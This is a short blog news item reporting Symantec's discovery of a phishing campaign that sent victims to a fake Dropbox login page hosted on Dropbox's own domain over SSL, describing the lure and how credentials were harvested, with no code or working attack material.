Hackers Used Dropbox For Phishing Attack

phishing attack

After the massive Dropbox credentials leak, everybody started thinking " How those passwords are leaked ?". Here is one of the method that hackers were used to steal Dropbox credentials.

Security firm Symantec said, it has detected a batch of phishing emails advising recipients that they’ve been sent a large file and included a link to Dropbox-hosted page.

The scam uses an email (with the subject "important") claiming that the recipient has been sent a document that is too big to be sent by email, or cannot be sent by email for security reasons. Instead, the email claims, the document can be viewed by clicking on the link included in the message. However, the link opens a fake Dropbox login page, hosted on Dropbox itself.

Nick Johnston from Symantec said " The fake login page is hosted on Dropbox's user content domain (like shared photos and other files are) and is served over SSL, making the attack more dangerous and convincing."

Hackers copied the exact layout and design of Dropbox login page and they also included logos of popular Web-based email services, suggesting that users can log in using these credentials as well.

Since the fake page and credentials are served over SSL, browser doesn't show any security warning when submitting credantials. The fake page uses a simple php script to sent users credentials to hackers server. After the submission, the php script redirects the user to real Dropbox login page.

Johnston said, "Some resources on the fake page (such as images or style sheets) are not served over SSL. Using non-SSL resources on a page served over SSL shows warnings in recent versions of some browsers. The prominence of the warning varies from browser to browser; some browsers simply change the padlock symbol shown in the address bar, whereas others include a small banner at the top of the page. Users may not notice or understand these security warnings or the associated implications."

Symnatec reported phishing page to Dropbox and they immediately took the page down. If you know any phishing pages like this, you can report that to  abuse@dropbox.com.

No comments

Powered by Blogger.